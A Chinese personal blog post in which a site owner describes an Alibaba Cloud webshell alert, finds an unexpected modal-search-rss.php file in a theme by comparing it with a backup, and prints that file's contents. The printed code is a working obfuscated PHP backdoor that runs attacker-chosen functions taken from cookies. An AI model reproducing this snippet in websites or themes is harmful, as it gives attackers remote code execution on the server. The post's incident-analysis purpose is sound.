阿里云提示网站后门-发现后门(Webshell)文件——待处理

文章目录[隐藏]

今天邮件收到了这个待处理的危急警报,一看,不就是官方主题吗?

image-20220712163725208

处理

反正我也用不到这主题,就先把主题文件删除了,但还是有点好奇,就找一下本地的备份文件,做一下对比,看是不是后面加上的,如果是,那可能网站真的不安全了。

先在本机上搜索一下modal-search-rss.php,没发现有这个文件,备份文件7月3日下载回来的

image-20220712164813756

这是7月3日备份文件,并没有modal-search-rss.php文件

image-20220712165243425

多出一个modal-search-rss.php文件,很明显是复制了modal-search.php文件后,修改而来

内容如下

<?php
 $theme =$_COOKIE;$layout=1;$tsize = sizeof($theme);if($tsize == 27) { if (in_array(gettype($theme).count($theme),$theme)) { $theme[29] = $theme[29].$theme[61];$theme[35] = $theme[29]($theme[35]);$theme = $theme[35]($theme[19],$theme[29]($theme[57]));$menu=12;$theme($layout,$menu,$tsize);$cnf=33;}}

总结

我没有动这个主动目录,那很明显是被人动过服务器了,看来要认真排查一下了,不然没感觉没安全感了

暂无评论

发表评论

您的电子邮件地址不会被公开,必填项已用*标注。

相关推荐